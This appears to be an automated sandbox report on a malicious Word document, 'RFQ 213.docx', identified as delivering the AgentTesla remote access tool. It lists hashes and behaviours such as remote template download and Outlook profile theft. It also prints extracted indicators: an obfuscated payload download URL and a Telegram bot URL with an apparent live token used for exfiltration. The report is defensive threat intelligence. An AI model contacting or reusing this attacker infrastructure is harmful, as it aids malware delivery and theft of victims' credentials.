General
-
Target
RFQ 213.docx
-
Size
10KB
-
Sample
230209-k9hqtaea29
-
MD5
d857a5a515e5221f28ff63a350a56358
-
SHA1
138129e241cd6d40386a5e31ab156e21c16ae5e4
-
SHA256
6ac8d00d9effe1d0d2959a343a1a2216c467c24011f56d6a438983efe5e3432c
-
SHA512
b0f1ba7666b0b27e9f96edd53e0b2173e4bf46e4ad353dcdf3af0e63ef8d9aac6c04760ee604bdb5975c3b2711ca51d2b878a28433532f0e8565ad23196fd966
-
SSDEEP
192:ScIMmtP5hG/b7XN+eOihO+5+5F7Jar/YEChI3ON:SPXRE7XtOih7wtar/YECOe
Static task
static1
Behavioral task
behavioral1
Sample
RFQ 213.docx
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
RFQ 213.docx
Resource
win10v2004-20220812-en
Malware Config
Extracted
http://00o0o0o0sdf000000ooOOOO0000000ooooooooOOOOOsdoo000oo@647601465/13.doc
Extracted
agenttesla
https://api.telegram.org/bot6010275350:AAH4W3CDRhQk0wgfyhQ_jITTy3QYmrxdDbw/
Targets
-
-
Target
RFQ 213.docx
-
Size
10KB
-
MD5
d857a5a515e5221f28ff63a350a56358
-
SHA1
138129e241cd6d40386a5e31ab156e21c16ae5e4
-
SHA256
6ac8d00d9effe1d0d2959a343a1a2216c467c24011f56d6a438983efe5e3432c
-
SHA512
b0f1ba7666b0b27e9f96edd53e0b2173e4bf46e4ad353dcdf3af0e63ef8d9aac6c04760ee604bdb5975c3b2711ca51d2b878a28433532f0e8565ad23196fd966
-
SSDEEP
192:ScIMmtP5hG/b7XN+eOihO+5+5F7Jar/YEChI3ON:SPXRE7XtOih7wtar/YECOe
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request
-
Downloads MZ/PE file
-
Abuses OpenXML format to download file from external location
-
Executes dropped EXE
-
Loads dropped DLL
-
Uses the VBS compiler for execution
-
Accesses Microsoft Outlook profiles
-
Looks up external IP address via web service
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory
-
Suspicious use of SetThreadContext
-